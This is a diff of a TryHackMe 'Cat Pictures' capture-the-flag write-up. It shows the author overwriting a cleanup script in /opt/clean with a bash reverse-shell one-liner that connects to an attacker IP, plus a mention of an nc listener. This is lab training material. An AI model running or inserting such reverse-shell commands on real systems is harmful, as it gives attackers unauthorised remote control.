Defalt-cloud/CTF-Writeups/TryHackMe/Cat Pictures/cat-pictures.md

 When I went to the “/opt/clean” location, there was a “clean.sh” script in there.
 It cleaned the “/tmp” directory completely.

-Let's hope into the **opt** directory and try to execute a rev shell and setup a nc listener.
+Let's try to execute a rev shell and setup a nc listener.
 This was my revshell :
 ```
 echo "bash -i >& /dev/tcp/10.9.2.48/9999 0>&1" > clean.sh
 ```